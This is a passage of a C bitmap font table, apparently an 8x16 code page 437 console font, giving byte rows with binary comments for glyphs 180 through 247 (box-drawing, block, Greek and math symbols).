0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 181 0xb5 '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0xf8, /* 11111000 */
0x18, /* 00011000 */
0xf8, /* 11111000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 182 0xb6 '? */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0xf6, /* 11110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
/* 183 0xb7 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
/* 184 0xb8 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xf8, /* 11111000 */
0x18, /* 00011000 */
0xf8, /* 11111000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 185 0xb9 '? */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0xf6, /* 11110110 */
0x06, /* 00000110 */
0xf6, /* 11110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
/* 186 0xba '? */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
/* 187 0xbb '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0x06, /* 00000110 */
0xf6, /* 11110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
/* 188 0xbc '? */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0xf6, /* 11110110 */
0x06, /* 00000110 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 189 0xbd '? */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 190 0xbe '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0xf8, /* 11111000 */
0x18, /* 00011000 */
0xf8, /* 11111000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 191 0xbf '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xf8, /* 11111000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 192 0xc0 '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x1f, /* 00011111 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 193 0xc1 '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0xff, /* 11111111 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 194 0xc2 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xff, /* 11111111 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 195 0xc3 '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x1f, /* 00011111 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 196 0xc4 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xff, /* 11111111 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 197 0xc5 '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0xff, /* 11111111 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 198 0xc6 '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x1f, /* 00011111 */
0x18, /* 00011000 */
0x1f, /* 00011111 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 199 0xc7 '? */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x37, /* 00110111 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
/* 200 0xc8 '? */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x37, /* 00110111 */
0x30, /* 00110000 */
0x3f, /* 00111111 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 201 0xc9 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x3f, /* 00111111 */
0x30, /* 00110000 */
0x37, /* 00110111 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
/* 202 0xca '? */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0xf7, /* 11110111 */
0x00, /* 00000000 */
0xff, /* 11111111 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 203 0xcb '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xff, /* 11111111 */
0x00, /* 00000000 */
0xf7, /* 11110111 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
/* 204 0xcc '? */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x37, /* 00110111 */
0x30, /* 00110000 */
0x37, /* 00110111 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
/* 205 0xcd '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xff, /* 11111111 */
0x00, /* 00000000 */
0xff, /* 11111111 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 206 0xce '? */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0xf7, /* 11110111 */
0x00, /* 00000000 */
0xf7, /* 11110111 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
/* 207 0xcf '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0xff, /* 11111111 */
0x00, /* 00000000 */
0xff, /* 11111111 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 208 0xd0 '? */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0xff, /* 11111111 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 209 0xd1 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xff, /* 11111111 */
0x00, /* 00000000 */
0xff, /* 11111111 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 210 0xd2 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xff, /* 11111111 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
/* 211 0xd3 '? */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x3f, /* 00111111 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 212 0xd4 '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x1f, /* 00011111 */
0x18, /* 00011000 */
0x1f, /* 00011111 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 213 0xd5 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x1f, /* 00011111 */
0x18, /* 00011000 */
0x1f, /* 00011111 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 214 0xd6 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x3f, /* 00111111 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
/* 215 0xd7 '? */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0xff, /* 11111111 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
/* 216 0xd8 '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0xff, /* 11111111 */
0x18, /* 00011000 */
0xff, /* 11111111 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 217 0xd9 '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0xf8, /* 11111000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 218 0xda '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x1f, /* 00011111 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 219 0xdb '? */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
/* 220 0xdc '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
/* 221 0xdd '? */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
0xf0, /* 11110000 */
/* 222 0xde '? */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
0x0f, /* 00001111 */
/* 223 0xdf '? */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0xff, /* 11111111 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 224 0xe0 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x76, /* 01110110 */
0xdc, /* 11011100 */
0xd8, /* 11011000 */
0xd8, /* 11011000 */
0xd8, /* 11011000 */
0xdc, /* 11011100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 225 0xe1 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x78, /* 01111000 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xd8, /* 11011000 */
0xcc, /* 11001100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xcc, /* 11001100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 226 0xe2 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 227 0xe3 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 228 0xe4 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0xc6, /* 11000110 */
0x60, /* 01100000 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 229 0xe5 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0xd8, /* 11011000 */
0xd8, /* 11011000 */
0xd8, /* 11011000 */
0xd8, /* 11011000 */
0xd8, /* 11011000 */
0x70, /* 01110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 230 0xe6 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x7c, /* 01111100 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0xc0, /* 11000000 */
0x00, /* 00000000 */
/* 231 0xe7 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x76, /* 01110110 */
0xdc, /* 11011100 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 232 0xe8 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x3c, /* 00111100 */
0x18, /* 00011000 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 233 0xe9 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x6c, /* 01101100 */
0x38, /* 00111000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 234 0xea '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0xee, /* 11101110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 235 0xeb '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x1e, /* 00011110 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x0c, /* 00001100 */
0x3e, /* 00111110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 236 0xec '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0xdb, /* 11011011 */
0xdb, /* 11011011 */
0xdb, /* 11011011 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 237 0xed '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x03, /* 00000011 */
0x06, /* 00000110 */
0x7e, /* 01111110 */
0xdb, /* 11011011 */
0xdb, /* 11011011 */
0xf3, /* 11110011 */
0x7e, /* 01111110 */
0x60, /* 01100000 */
0xc0, /* 11000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 238 0xee '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x1c, /* 00011100 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x7c, /* 01111100 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x30, /* 00110000 */
0x1c, /* 00011100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 239 0xef '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 240 0xf0 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 241 0xf1 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x7e, /* 01111110 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 242 0xf2 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x0c, /* 00001100 */
0x06, /* 00000110 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 243 0xf3 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x0c, /* 00001100 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 244 0xf4 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x0e, /* 00001110 */
0x1b, /* 00011011 */
0x1b, /* 00011011 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 245 0xf5 '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0xd8, /* 11011000 */
0xd8, /* 11011000 */
0xd8, /* 11011000 */
0x70, /* 01110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 246 0xf6 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 247 0xf7 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x76, /* 01110110 */
